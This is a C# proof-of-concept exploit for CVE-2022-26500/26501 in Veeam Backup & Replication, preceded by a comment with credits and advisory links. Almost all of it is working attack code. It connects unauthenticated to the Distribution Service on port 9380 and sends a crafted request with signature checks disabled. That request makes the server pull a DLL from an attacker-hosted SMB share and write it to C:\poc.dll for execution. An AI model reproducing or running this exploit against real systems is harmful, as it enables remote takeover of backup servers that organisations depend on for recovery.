/*

# Vulnerability:

CVE-2022-26500 | CVE-2022-26501 Veeam Backup & Replication Remote Code Execution Vulnerability

# Description:

Firstly, shout out to Nikita Petrov (@ultrayoba) for discovering these two interesting vulnerabilities.

The Veeam Distribution Service (TCP 9380 by default) allows unauthenticated users to access internal API functions. A remote attacker may send input to the internal API which may lead to uploading and executing of malicious code.


# Exploit Author:

Sina Kheirkhah (@SinSinology) of @SummoningTeam

# More Details:

https://www.mdsec.co.uk/2022/03/abc-code-execution-for-veeam/
https://www.veeam.com/kb4288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26500
https://twitter.com/ultrayoba
https://y4er.com/posts/cve-2022-26500-veeam-backup-replication-rce/

*/

internal class Program
    {
        static TcpClient client = null;

        static void Main(string[] args)
        {
            string guidKey = String.Format("{{{0}}}", Guid.NewGuid().ToString());
            IPAddress ipAddress = IPAddress.Parse(args[0]);
            IPEndPoint remoteEP = new IPEndPoint(ipAddress, 9380);
            client = new TcpClient();
            client.Connect(remoteEP);
            Console.WriteLine("Client connected to {0}.", remoteEP.ToString());

            NetworkStream clientStream = client.GetStream();
            NegotiateStream authStream = new NegotiateStream(clientStream, false);
            try
            {
                NetworkCredential netcred = new NetworkCredential("", "");
                authStream.AuthenticateAsClient(netcred, "", ProtectionLevel.EncryptAndSign, TokenImpersonationLevel.Identification);
                CInputXmlData FIData = new CInputXmlData("FIData");
                CInputXmlData FISpec = new CInputXmlData("FISpec");
                FISpec.SetInt32("FIScope", 190);
                FISpec.SetGuid("FISessionId", Guid.Empty);
                FISpec.SetInt32("FIMethod", 25);
                FISpec.SetString("SystemType", "WIN");
                FISpec.SetString("Host", "127.0.0.1");
                IPAddress[] HostIps = new IPAddress[] { IPAddress.Loopback };
                String[] strAddrs = (from cad in HostIps select cad.ToString()).ToArray();
                FISpec.SetStrings("HostIps", strAddrs);
                FISpec.SetString("User", SStringMasker.Mask("", guidKey));
                FISpec.SetString("Password", SStringMasker.Mask("", guidKey));
                FISpec.SetString("TaskType", "Package");
                FISpec.SetString("FixProductType", "");
                FISpec.SetString("FixProductVeresion", "");
                FISpec.SetUInt64("FixIssueNumber", 0);
                FISpec.SetString("SshCredentials", SStringMasker.Mask("", guidKey));
                FISpec.SetString("SshFingerprint", "");
                FISpec.SetBool("SshTrustAll", true);
                FISpec.SetBool("IsWindows", true);
                FISpec.SetBool("IsFix", true);
                FISpec.SetBool("CheckSignatureBeforeUpload", false);
                FISpec.SetEnum<ESSHProtocol>("DefaultProtocol", ESSHProtocol.Rebex);
                FISpec.SetString("FileRelativePath", "FileRelativePath");
                FISpec.SetString("FileProxyPath", @"\\\\192.168.56.1\\payload\\VeeamDeploymentDll.dll");
                FISpec.SetString("FileRemotePath", @"C:\\poc.dll");
                FIData.InjectChild(FISpec);

                Console.WriteLine(FIData.Root.OuterXml);

                new BinaryWriter(authStream).WriteCompressedString(FIData.Root.OuterXml, Encoding.UTF8);

                string response = new BinaryReader(authStream).ReadCompressedString(int.MaxValue, Encoding.UTF8);
                Console.WriteLine("response:");
                Console.WriteLine(response);
            }
            catch (Exception e)
            {
                Console.WriteLine(e);
            }
            finally
            {
                authStream.Close();
            }
            Console.ReadKey();

        }

    }